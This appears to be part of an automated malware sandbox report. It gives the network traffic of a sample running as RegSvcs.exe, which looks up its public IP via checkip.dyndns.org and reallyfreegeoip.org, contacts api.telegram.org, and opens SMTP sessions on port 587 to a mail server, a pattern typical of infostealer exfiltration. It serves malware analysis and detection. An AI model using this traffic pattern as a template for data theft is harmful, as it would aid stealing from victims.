                                                                              Oct 9, 2024 14:45:23.319276094 CEST49722443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:23.319319010 CEST44349722188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:23.319380045 CEST49722443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:23.319869995 CEST49722443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:23.319885969 CEST44349722188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:23.363363028 CEST4972180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:23.805131912 CEST44349722188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:23.806915998 CEST49722443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:23.806943893 CEST44349722188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:23.944570065 CEST44349722188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:23.944691896 CEST44349722188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:23.944820881 CEST49722443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:23.945416927 CEST49722443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:23.975109100 CEST4972180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:23.975601912 CEST4972380192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:23.980508089 CEST8049723193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:23.980741024 CEST8049721193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:23.980846882 CEST4972380192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:23.980848074 CEST4972180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:23.980896950 CEST4972380192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:23.985769987 CEST8049723193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:24.627980947 CEST8049723193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:24.629554033 CEST49724443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:24.629590034 CEST44349724188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:24.629878044 CEST49724443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:24.629904985 CEST49724443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:24.629909039 CEST44349724188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:24.675929070 CEST4972380192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:25.100774050 CEST44349724188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:25.102475882 CEST49724443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:25.102499008 CEST44349724188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:25.249043941 CEST44349724188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:25.249280930 CEST44349724188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:25.249340057 CEST49724443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:25.250076056 CEST49724443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:25.253417969 CEST4972380192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:25.254568100 CEST4972680192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:25.259499073 CEST8049723193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:25.259565115 CEST4972380192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:25.260159016 CEST8049726193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:25.260235071 CEST4972680192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:25.260351896 CEST4972680192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:25.266294003 CEST8049726193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:25.887968063 CEST8049726193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:25.889184952 CEST49729443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:25.889224052 CEST44349729188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:25.889380932 CEST49729443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:25.889624119 CEST49729443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:25.889637947 CEST44349729188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:25.941515923 CEST4972680192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:26.349617004 CEST44349729188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:26.351357937 CEST49729443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:26.351403952 CEST44349729188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:26.486605883 CEST44349729188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:26.486706018 CEST44349729188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:26.486792088 CEST49729443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:26.487353086 CEST49729443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:26.490365982 CEST4972680192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:26.491432905 CEST4973180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:26.496484041 CEST8049731193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:26.496593952 CEST4973180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:26.496649981 CEST4973180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:26.497354031 CEST8049726193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:26.497407913 CEST4972680192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:26.501930952 CEST8049731193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:27.128807068 CEST8049731193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:27.129280090 CEST4973180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:27.130101919 CEST49733443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:27.130143881 CEST44349733188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:27.130220890 CEST49733443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:27.130624056 CEST49733443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:27.130639076 CEST44349733188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:27.134676933 CEST8049731193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:27.134741068 CEST4973180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:27.590748072 CEST44349733188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:27.599278927 CEST49733443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:27.599294901 CEST44349733188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:27.724653959 CEST44349733188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:27.724756002 CEST44349733188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:27.724837065 CEST49733443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:27.750072956 CEST49733443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:27.939248085 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:27.939274073 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:27.939409971 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:27.947683096 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:27.947695971 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:29.569412947 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:29.569504023 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:29.573570967 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:29.573577881 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:29.573832989 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:29.582921982 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:29.627402067 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:29.818815947 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:29.818881989 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:29.818994999 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:29.832639933 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:35.641568899 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:35.646461964 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:35.646549940 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:36.786866903 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:36.787121058 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:36.793821096 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.050111055 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.050338984 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:37.055672884 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.352309942 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.352874994 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:37.357846022 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.629070997 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.629621029 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.629710913 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:37.631726027 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:37.638169050 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.898633957 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.921444893 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:37.926356077 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:38.328382015 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:38.329159021 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:38.333893061 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:38.592576027 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:38.592941046 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:38.598397017 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:38.869231939 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:38.869649887 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:38.874509096 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.132128000 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.132411957 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:39.137192011 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.658699989 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.658951998 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:39.667295933 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.992367983 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.993417025 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:39.993488073 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:39.993519068 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:39.993542910 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:39.998348951 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.998366117 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.998380899 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.998466969 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:40.440579891 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:40.488428116 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:41.943928957 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:41.948906898 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:42.626591921 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:42.627096891 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:42.628124952 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:42.634257078 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:42.634356976 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:43.868622065 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:43.868843079 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:43.874509096 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.140444994 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.140820980 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:44.145742893 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.415576935 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.416224957 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:44.421142101 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.704081059 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.704107046 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.704132080 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.704262972 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:44.706307888 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:44.711165905 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.975028038 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.978954077 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:44.983795881 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:45.247931957 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:45.255012035 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:45.259948969 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:45.526326895 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:45.526587009 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:45.531549931 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:45.810492039 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:45.810739040 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:45.815892935 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.080734968 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.081345081 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:46.086329937 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.435252905 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.435556889 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:46.440668106 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.706062078 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.706389904 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:46.706485033 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:46.706485033 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:46.706525087 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:46.711787939 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.711808920 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.711838961 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.711852074 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.711864948 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:47.153527021 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:47.207187891 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:47:22.067414045 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:47:22.265441895 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:47:22.951688051 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:47:22.952564001 CEST49737587192.168.2.1246.151.208.21

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 9, 2024 14:45:13.858566999 CEST5238553192.168.2.121.1.1.1
                                                                              Oct 9, 2024 14:45:13.867832899 CEST53523851.1.1.1192.168.2.12
                                                                              Oct 9, 2024 14:45:15.638025999 CEST6399153192.168.2.121.1.1.1
                                                                              Oct 9, 2024 14:45:15.649276018 CEST53639911.1.1.1192.168.2.12
                                                                              Oct 9, 2024 14:45:27.915414095 CEST5524753192.168.2.121.1.1.1
                                                                              Oct 9, 2024 14:45:27.927830935 CEST53552471.1.1.1192.168.2.12
                                                                              Oct 9, 2024 14:45:35.193994045 CEST5804953192.168.2.121.1.1.1
                                                                              Oct 9, 2024 14:45:35.640786886 CEST53580491.1.1.1192.168.2.12

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 9, 2024 14:45:13.858566999 CEST192.168.2.121.1.1.10x9b3bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                              Oct 9, 2024 14:45:15.638025999 CEST192.168.2.121.1.1.10x1ca3Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                              Oct 9, 2024 14:45:27.915414095 CEST192.168.2.121.1.1.10x4cb5Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                              Oct 9, 2024 14:45:35.193994045 CEST192.168.2.121.1.1.10xcc21Standard query (0)mail.irco.com.saA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 9, 2024 14:45:13.867832899 CEST1.1.1.1192.168.2.120x9b3bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 9, 2024 14:45:13.867832899 CEST1.1.1.1192.168.2.120x9b3bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                              Oct 9, 2024 14:45:13.867832899 CEST1.1.1.1192.168.2.120x9b3bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                              Oct 9, 2024 14:45:13.867832899 CEST1.1.1.1192.168.2.120x9b3bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                              Oct 9, 2024 14:45:13.867832899 CEST1.1.1.1192.168.2.120x9b3bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                              Oct 9, 2024 14:45:13.867832899 CEST1.1.1.1192.168.2.120x9b3bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                              Oct 9, 2024 14:45:15.649276018 CEST1.1.1.1192.168.2.120x1ca3No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                              Oct 9, 2024 14:45:15.649276018 CEST1.1.1.1192.168.2.120x1ca3No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                              Oct 9, 2024 14:45:27.927830935 CEST1.1.1.1192.168.2.120x4cb5No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                              Oct 9, 2024 14:45:35.640786886 CEST1.1.1.1192.168.2.120xcc21No error (0)mail.irco.com.sa46.151.208.21A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • reallyfreegeoip.org
                                                                              • api.telegram.org
                                                                              • checkip.dyndns.org

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.1249711193.122.6.168807020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 9, 2024 14:45:13.878197908 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 9, 2024 14:45:15.409717083 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:14 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 2d57bca461442d145069b8f4eb2f6ca1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 9, 2024 14:45:15.410913944 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:14 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 2d57bca461442d145069b8f4eb2f6ca1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 9, 2024 14:45:15.412327051 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:14 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 2d57bca461442d145069b8f4eb2f6ca1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 9, 2024 14:45:15.413544893 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 9, 2024 14:45:15.414058924 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:14 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 2d57bca461442d145069b8f4eb2f6ca1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 9, 2024 14:45:15.602896929 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:15 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: c959a6ea0fa47033c615ec7579b8600f
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 9, 2024 14:45:16.327049017 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 9, 2024 14:45:16.514153957 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:16 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 26d3cbfc4dc7c6545d050669643d01c1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.1249714193.122.6.168807020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 9, 2024 14:45:17.160048008 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 9, 2024 14:45:17.787153006 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:17 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 8a62b44ce179146a99294c07a91e4429
